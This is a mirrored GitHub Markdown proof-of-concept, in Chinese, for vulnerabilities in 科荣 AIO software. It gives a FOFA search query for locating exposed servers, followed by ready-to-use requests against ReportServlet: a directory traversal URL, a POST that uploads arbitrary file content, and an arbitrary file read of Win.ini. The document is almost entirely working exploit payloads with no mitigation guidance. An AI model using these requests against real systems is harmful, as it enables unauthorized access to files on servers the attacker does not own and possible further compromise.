mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
27 lines
525 B
Markdown
27 lines
525 B
Markdown
|
|
## 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
```
|
||
|
|
body="changeAccount('8000')"
|
||
|
|
```
|
||
|
|
## 目录遍历
|
||
|
|
```
|
||
|
|
http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
|
||
|
|
```
|
||
|
|
|
||
|
|
## 文件上传
|
||
|
|
```
|
||
|
|
POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1
|
||
|
|
Host: xxxxxx
|
||
|
|
Connection: lose
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
Content-Length: 2
|
||
|
|
|
||
|
|
demo
|
||
|
|
```
|
||
|
|
|
||
|
|
## 任意文件读取
|
||
|
|
```
|
||
|
|
http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
|
||
|
|
```
|